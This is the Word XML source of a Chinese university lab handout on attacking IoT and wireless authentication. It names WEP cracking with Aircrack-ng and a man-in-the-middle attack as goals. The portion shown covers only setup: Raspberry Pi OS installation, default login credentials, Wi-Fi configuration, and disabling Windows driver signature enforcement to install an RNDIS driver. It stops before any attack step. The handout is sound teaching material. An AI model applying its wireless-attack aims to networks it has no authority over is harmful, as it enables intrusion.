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63E8" w14:textId="446B95CF" w:rsidR="00A43C36" w:rsidRPr="007A4F58" w:rsidRDefault="00624743" w:rsidP="00624743">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>物聯網</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>核心技術</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">實驗四 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>物聯網</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>與無線網路認證協定之攻擊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65122BE4" w14:textId="77777777" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743" w:rsidP="00624743">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>國立中正大學資訊工程系 黃仁</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>竑</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>教授</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC6E4D1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實驗目的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C11333" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帶同學動手實作，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raspberry Pi </w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>實作</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>針對物聯網</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>與無線網路認證協定之攻擊。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A74E0" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目標</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>-ng</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>WEP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>協定密碼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6764A4" w14:textId="6C194C7B" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目標二：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>Man-in-the-middle attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58B6D1" w14:textId="77777777" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743" w:rsidP="00624743">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
        </w:tabs>
        <w:spacing w:beforeLines="50" w:before="180"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>實驗所需軟硬體</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21980CD6" w14:textId="6514EEBC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ab/>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>軟體：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F179BE7" w14:textId="4EDFFCF5" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:leftChars="0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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>ndows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF060C" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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>SD card Formatter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A00B8" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>BelenaEtcher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01F8162E" w14:textId="596C8B15" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="480"/>
        </w:tabs>
        <w:snapToGrid w:val="0"/>
        <w:spacing w:line="240" w:lineRule="atLeast"/>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>MobaXterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="342092B3" w14:textId="1B1F120A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ab/>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬體</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D07CFC" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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>Raspberry pi 4B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D418DAA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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>SD</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B1265" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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t>USB Wi-Fi adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C6C25A" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>TypeC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t>typeA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:t xml:space="preserve"> cable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203D3AA" w14:textId="2CCF3053" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D985A" w14:textId="504C7A82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lastRenderedPageBreak/>
        <w:t>安裝</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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r</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aspbian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="700F8357" w14:textId="77777777" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="006123A9">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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先用</w:t>
      </w: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SD card Formatter</w:t>
      </w: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將</w:t>
      </w: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SD</w:t>
      </w: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卡格式化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F83A3A" w14:textId="77777777" w:rsidR="00AD3318" w:rsidRDefault="006123A9" w:rsidP="00AD3318">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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BelenaEtcher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燒錄指定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD331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，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA16240" w14:textId="156A4C27" w:rsidR="006123A9" w:rsidRPr="00AD3318" w:rsidRDefault="00AD3318" w:rsidP="00AD3318">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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 xml:space="preserve">下載網址: </w:t>
      </w:r>
      <w:r w:rsidR="006123A9" w:rsidRPr="00AD3318">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.raspberrypi.com/software/operating-systems/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D432F34" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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4-1</w:t>
      </w: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使用</w:t>
      </w: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Raspberry Pi OS (Legacy) with desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576C4C4" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13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4-2</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58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使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Raspberry Pi OS with desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2104A0D9" w14:textId="0C9BE372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Cs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Headless installation (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C2E366" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0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在</w:t>
      </w:r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/boot</w:t>
      </w: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中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AA0A3" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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新增</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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空白</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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檔</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60116C39" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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新增新的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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wpa_supplicant.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，建議以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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nodepad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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++</w:t>
      </w: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編輯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771ACD6" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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找到</w:t>
      </w:r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raspberry pi</w:t>
      </w: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的</w:t>
      </w:r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IP</w:t>
      </w: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，以</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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進入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F005751" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2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預設帳號：</w:t>
      </w:r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pi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53714762" w14:textId="091FBBCD" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16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</w:pPr>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>預設密碼：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4F58">
        <w:rPr>
          <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>raspberry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4F66A" w14:textId="4330E32D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wpa_supplicant.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06E1C564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ctrl_interface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=DIR=/var/run/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wpa_supplicant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GROUP=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netdev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E5E465A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update_config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=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BDA6F1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country=TW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA2087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network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={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="167E9EA2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ssid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=“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YOUR SSID"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12985A30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psk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=“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YOUR PASSWOED"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C892CA" w14:textId="77777777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ind w:leftChars="100" w:left="2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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45881901" w14:textId="23519DC0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 xml:space="preserve">在 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Windows 10 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 xml:space="preserve">上安裝 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USB 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虛擬網路卡驅動程式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24343289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Settings(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設定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)→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01836D7E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Update &amp; security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（更新與安全性）→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C2556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Recovery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（復原）→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F010E50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Troubleshoot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（移難排解）→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EEFA3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Advanced options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（進階選項）→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C16DF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Startup Settings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（啟動設定）→ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56324B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lastRenderedPageBreak/>
        <w:t>Restart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（重新啟動）→</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED43372" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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按下“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F7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″</w:t>
      </w:r>
      <w:proofErr w:type="gram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，代表要停用驅動程式強制簽章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D8D52" w14:textId="011398F4" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="00624743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 xml:space="preserve">在 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Windows 10 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 xml:space="preserve">上安裝 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USB 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虛擬網路卡驅動程式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B1540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下載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RNDIS driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AAF7CA" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007A4F58">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="微軟正黑體" w:eastAsia="微軟正黑體" w:hAnsi="微軟正黑體" w:cs="新細明體"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://modclouddownloadprod.blob.core.windows.net/shared/mod-rndis-driver-windows.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27F0DB6C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raspberry pi(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TypeC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)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與電腦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TypeA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)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相連</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E8C4F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開始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 →裝置管理員→通用序列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埠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控制器裝置清單→未知的 USB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序列裝置→右鍵更新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driver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也有可能在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COM port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F996E1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選擇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: Browse my computer for driver software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”</w:t>
      </w:r>
      <w:proofErr w:type="gram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（瀏覽電腦上的驅動程式軟體）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061E09F6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選擇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: Let me pick from a list of device drivers on my computer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”</w:t>
      </w:r>
      <w:proofErr w:type="gram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（讓我從電腦上的裝置驅動程式清單中挑選）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4970DC23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選擇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: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從磁片安裝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA0648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選擇剛剛下載的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driver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資料夾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proofErr w:type="gramStart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需解壓縮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)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，點選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RNDISCMP.inf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，按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OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408FAA49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按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next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close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628479D9" w14:textId="77777777" w:rsidR="006123A9" w:rsidRPr="007A4F58" w:rsidRDefault="006123A9" w:rsidP="00624743">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr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開始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)→設定→網路及網際網路→變更介面卡選項→檢查是否有USB Ethernet/RNDIS Gadget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20421350" w14:textId="77777777" w:rsidR="00AD3318" w:rsidRDefault="00AD3318">
      <w:pPr>
        <w:widowControl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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF6CFB" w14:textId="32DE968B" w:rsidR="00624743" w:rsidRPr="007A4F58" w:rsidRDefault="0006478A" w:rsidP="00624743">
